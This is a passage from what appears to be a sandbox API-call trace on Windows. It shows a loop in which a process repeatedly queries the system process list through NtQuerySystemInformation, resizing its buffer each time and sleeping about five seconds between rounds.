RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.194] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.201] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.222] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.229] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.239] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.247] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.254] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.283] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.291] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.297] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.305] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.311] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.324] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.331] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 